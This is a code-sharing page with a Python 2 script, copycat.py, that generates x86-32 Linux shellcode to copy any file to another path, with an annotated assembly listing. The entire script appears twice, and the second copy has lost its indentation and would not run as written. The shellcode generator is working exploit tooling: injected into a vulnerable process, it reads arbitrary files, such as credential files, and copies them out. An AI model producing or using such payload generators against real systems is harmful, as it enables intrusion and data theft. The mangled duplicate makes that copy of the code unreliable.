numberten · September 30, 2015 11:51
diff --git a/copycat.py b/copycat.py
 #!/usr/bin/python

 import sys

 """
 Takes an absolute path and generates x86-32 shellcode for copying the file
 at that location to /tmp/outfile
 """

 if len(sys.argv) != 3:
    print "Usage: " + sys.argv[0] + " <src> <dst>"
    sys.exit(0)

 start = "\\x31\\xc0\\xb0\\x05\\x31\\xc9\\x51"
 middle = "\\x8d\\x5c\\x24\\x01\\xcd\\x80\\x89\\xc3\\xb0\\x03\\x89\\xe7\\x89\\xf9\\x31\\xd2\\x4a\\xc1\\xea\\x10\\xcd\\x80\\x89\\xc6\\x6a\\x05\\x58\\x31\\xc9\\x51"
 end = "\\x89\\xe3\\xb1\\x42\\x66\\x68\\xa4\\x01\\x5a\\xcd\\x80\\x89\\xc3\\x6a\\x04\\x58\\x89\\xf9\\x89\\xf2\\xcd\\x80\\x31\\xc0\\x31\\xdb\\xb0\\x01\\xb3\\x05\\xcd\\x80"

 def gen_string(path):
    padding= '/' * ((4 - (len(path) % 4)) % 4)
    path = padding + path
    chunks = ['h'+path[i:i+4] for i in range(0, len(path), 4)][::-1]
    hex_chunks = map(lambda x: '\\x'+str(format(ord(x),"x")),''.join(chunks))
    return ''.join(hex_chunks)

 src = gen_string(sys.argv[1])
 dst = gen_string(sys.argv[2])

 shellcode = start + src + middle + dst + end

 print "Shellcode length: "+str(len(shellcode)/4)
 print "Shellcode: "+shellcode

 """
 Assembly:

 31 c0                   xor    %eax,%eax
 b0 05                   mov    $0x5,%al
 31 c9                   xor    %ecx,%ecx
 51                      push   %ecx

 // push source

 8d 5c 24 01             lea    0x1(%esp),%ebx
 cd 80                   int    $0x80
 89 c3                   mov    %eax,%ebx
 b0 03                   mov    $0x3,%al
 89 e7                   mov    %esp,%edi
 89 f9                   mov    %edi,%ecx
 31 d2                   xor    %edx,%edx
 4a                      dec    %edx
 c1 ea 10                shr    $0x10,%edx
 cd 80                   int    $0x80
 89 c6                   mov    %eax,%esi
 6a 05                   push   $0x5
 58                      pop    %eax
 31 c9                   xor    %ecx,%ecx
 51                      push   %ecx

 // push destination

 89 e3                   mov    %esp,%ebx
 b1 42                   mov    $0x42,%cl
 66 68 a4 01             pushw  $0x1a4
 5a                      pop    %edx
 cd 80                   int    $0x80
 89 c3                   mov    %eax,%ebx
 6a 04                   push   $0x4
 58                      pop    %eax
 89 f9                   mov    %edi,%ecx
 89 f2                   mov    %esi,%edx
 cd 80                   int    $0x80
 31 c0                   xor    %eax,%eax
 31 db                   xor    %ebx,%ebx
 b0 01                   mov    $0x1,%al
 b3 05                   mov    $0x5,%bl
 cd 80                   int    $0x80
 """
	#!/usr/bin/python

	import sys

	"""
	Takes an absolute path and generates x86-32 shellcode for copying the file
	at that location to /tmp/outfile
	"""

	if len(sys.argv) != 3:
	print "Usage: " + sys.argv[0] + " <src> <dst>"
	sys.exit(0)

	start = "\\x31\\xc0\\xb0\\x05\\x31\\xc9\\x51"
	middle = "\\x8d\\x5c\\x24\\x01\\xcd\\x80\\x89\\xc3\\xb0\\x03\\x89\\xe7\\x89\\xf9\\x31\\xd2\\x4a\\xc1\\xea\\x10\\xcd\\x80\\x89\\xc6\\x6a\\x05\\x58\\x31\\xc9\\x51"
	end = "\\x89\\xe3\\xb1\\x42\\x66\\x68\\xa4\\x01\\x5a\\xcd\\x80\\x89\\xc3\\x6a\\x04\\x58\\x89\\xf9\\x89\\xf2\\xcd\\x80\\x31\\xc0\\x31\\xdb\\xb0\\x01\\xb3\\x05\\xcd\\x80"

	def gen_string(path):
	padding= '/' * ((4 - (len(path) % 4)) % 4)
	path = padding + path
	chunks = ['h'+path[i:i+4] for i in range(0, len(path), 4)][::-1]
	hex_chunks = map(lambda x: '\\x'+str(format(ord(x),"x")),''.join(chunks))
	return ''.join(hex_chunks)

	src = gen_string(sys.argv[1])
	dst = gen_string(sys.argv[2])

	shellcode = start + src + middle + dst + end

	print "Shellcode length: "+str(len(shellcode)/4)
	print "Shellcode: "+shellcode

	"""
	Assembly:

	31 c0 xor %eax,%eax
	b0 05 mov $0x5,%al
	31 c9 xor %ecx,%ecx
	51 push %ecx

	// push source

	8d 5c 24 01 lea 0x1(%esp),%ebx
	cd 80 int $0x80
	89 c3 mov %eax,%ebx
	b0 03 mov $0x3,%al
	89 e7 mov %esp,%edi
	89 f9 mov %edi,%ecx
	31 d2 xor %edx,%edx
	4a dec %edx
	c1 ea 10 shr $0x10,%edx
	cd 80 int $0x80
	89 c6 mov %eax,%esi
	6a 05 push $0x5
	58 pop %eax
	31 c9 xor %ecx,%ecx
	51 push %ecx

	// push destination

	89 e3 mov %esp,%ebx
	b1 42 mov $0x42,%cl
	66 68 a4 01 pushw $0x1a4
	5a pop %edx
	cd 80 int $0x80
	89 c3 mov %eax,%ebx
	6a 04 push $0x4
	58 pop %eax
	89 f9 mov %edi,%ecx
	89 f2 mov %esi,%edx
	cd 80 int $0x80
	31 c0 xor %eax,%eax
	31 db xor %ebx,%ebx
	b0 01 mov $0x1,%al
	b3 05 mov $0x5,%bl
	cd 80 int $0x80
	"""